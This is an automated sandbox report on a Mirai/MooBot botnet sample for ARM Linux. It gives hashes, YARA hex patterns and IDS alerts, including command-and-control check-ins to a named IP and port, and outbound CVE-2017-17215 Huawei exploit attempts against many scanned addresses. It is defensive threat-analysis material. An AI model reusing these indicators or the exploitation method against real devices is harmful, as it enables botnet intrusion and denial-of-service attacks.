Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
huhu.arm7.elf

Overview

General Information

Sample name:huhu.arm7.elf
Analysis ID:1377578
MD5:9b524d00f9003637c86c4266d9b8d2a4
SHA1:503c0da6d708a2d094f1f6b7b7f04a2d8092e507
SHA256:55578c93816695c44d6c9496aaf0da8be56941baaf69235b5a6baa2d5d09d456
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1377578
Start date and time:2024-01-19 17:28:01 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:huhu.arm7.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@18/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: huhu.arm7.elf
Command:/tmp/huhu.arm7.elf
PID:5478
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5493, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5493, Parent: 1383, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
huhu.arm7.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    huhu.arm7.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      huhu.arm7.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1a50c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a520:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a534:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a548:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a55c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a570:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a584:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a598:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a610:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a624:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a638:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a64c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a660:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a674:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a688:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a69c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5478.1.00007f91dc017000.00007f91dc034000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5478.1.00007f91dc017000.00007f91dc034000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5478.1.00007f91dc017000.00007f91dc034000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1a50c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a520:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a534:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a548:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a55c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a570:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a584:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a598:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a610:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a624:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a638:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a64c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a660:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a674:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a688:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a69c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: huhu.arm7.elf PID: 5478JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: huhu.arm7.elf PID: 5478Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0xf0e3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf0f7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf10b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf11f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf133:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf147:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf15b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf16f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf183:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf197:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf1ab:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf1bf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf1d3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf1e7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf1fb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf20f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf223:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf237:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf24b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf25f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf273:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.14163.15.168.17456152372152835222 01/19/24-17:29:57.168704
            SID:2835222
            Source Port:56152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14649916199902030490 01/19/24-17:30:20.666634
            SID:2030490
            Source Port:49916
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14642884199902030490 01/19/24-17:29:09.784870
            SID:2030490
            Source Port:42884
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1441.207.107.10258484372152829579 01/19/24-17:29:57.215100
            SID:2829579
            Source Port:58484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14636960199902030490 01/19/24-17:30:07.130366
            SID:2030490
            Source Port:36960
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641702199902030490 01/19/24-17:28:38.605135
            SID:2030490
            Source Port:41702
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641848199902030490 01/19/24-17:28:44.724071
            SID:2030490
            Source Port:41848
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14656862199902030490 01/19/24-17:29:59.371421
            SID:2030490
            Source Port:56862
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1441.207.107.10258484372152835222 01/19/24-17:29:57.215100
            SID:2835222
            Source Port:58484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14633162199902030490 01/19/24-17:30:31.439660
            SID:2030490
            Source Port:33162
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14642670199902030490 01/19/24-17:29:05.023743
            SID:2030490
            Source Port:42670
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14633150199902030490 01/19/24-17:29:36.069715
            SID:2030490
            Source Port:33150
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14648392199902030490 01/19/24-17:29:50.606283
            SID:2030490
            Source Port:48392
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14642204199902030490 01/19/24-17:28:55.262281
            SID:2030490
            Source Port:42204
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14163.18.29.14849080372152835222 01/19/24-17:30:18.651441
            SID:2835222
            Source Port:49080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14642562199902030490 01/19/24-17:30:41.968203
            SID:2030490
            Source Port:42562
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14644350199902030490 01/19/24-17:29:19.548164
            SID:2030490
            Source Port:44350
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641148199902030490 01/19/24-17:29:43.835691
            SID:2030490
            Source Port:41148
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14163.15.168.17456152372152829579 01/19/24-17:29:57.168704
            SID:2829579
            Source Port:56152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14163.18.29.14849080372152829579 01/19/24-17:30:18.651441
            SID:2829579
            Source Port:49080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:103.245.236.146192.168.2.1419990499162030489 01/19/24-17:30:21.003247
            SID:2030489
            Source Port:19990
            Destination Port:49916
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14642402199902030490 01/19/24-17:30:13.896312
            SID:2030490
            Source Port:42402
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14652742199902030490 01/19/24-17:29:26.309102
            SID:2030490
            Source Port:52742
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14637358199902030490 01/19/24-17:30:36.206234
            SID:2030490
            Source Port:37358
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641854199902030490 01/19/24-17:28:46.493462
            SID:2030490
            Source Port:41854
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: huhu.arm7.elfAvira: detected
            Source: huhu.arm7.elfReversingLabs: Detection: 60%
            Source: huhu.arm7.elfString: /proc/proc/%d/cmdlinewgetcurlbusyboxechocatnano

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41702 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41848 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41854 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:42204 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:42670 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:42884 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:44350 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:52742 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:33150 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41148 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:48392 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56152 -> 163.15.168.174:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56152 -> 163.15.168.174:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58484 -> 41.207.107.102:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58484 -> 41.207.107.102:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:56862 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:36960 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:42402 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49080 -> 163.18.29.148:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49080 -> 163.18.29.148:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:49916 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.245.236.146:19990 -> 192.168.2.14:49916
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:33162 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:37358 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:42562 -> 103.245.236.146:19990
            Source: global trafficTCP traffic: 137.132.117.237 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.130.75.142 ports 1,2,3,5,7,37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56152 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58484 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56152 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56152 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49080 -> 37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.146.236.29:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.21.133.73:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.182.139.49:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 195.106.229.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.148.100.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.218.102.218:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.158.51.203:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.31.69.227:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.140.101.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.142.242.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.165.46.160:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.251.147.173:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 147.181.96.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.172.15.191:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.10.36.5:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 130.151.137.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.165.208.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.175.126.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.221.173.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.113.102.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.252.116.2:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.168.162.184:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.228.22.143:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 220.234.219.176:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.22.118.102:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 208.187.189.163:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.254.143.126:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.181.168.10:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.225.143.126:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 58.127.5.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.93.86.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.157.151.212:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.64.176.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.195.142.123:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.164.157.9:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 120.236.254.9:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.38.29.29:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 18.111.146.170:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.185.159.237:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.79.57.53:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.125.143.61:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.214.83.227:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.231.246.135:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 100.10.42.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.178.18.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.220.30.9:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.121.148.245:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.40.189.18:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.42.45.50:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.155.225.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.160.102.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.244.246.118:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.135.237.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 63.140.59.173:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.149.78.201:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 89.177.200.146:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.162.92.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 64.118.4.11:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.87.209.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 111.90.231.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.33.198.116:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.220.178.172:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.184.176.190:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.101.118.85:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.224.27.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.81.209.6:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 120.96.69.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.20.211.165:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 87.84.125.150:37215
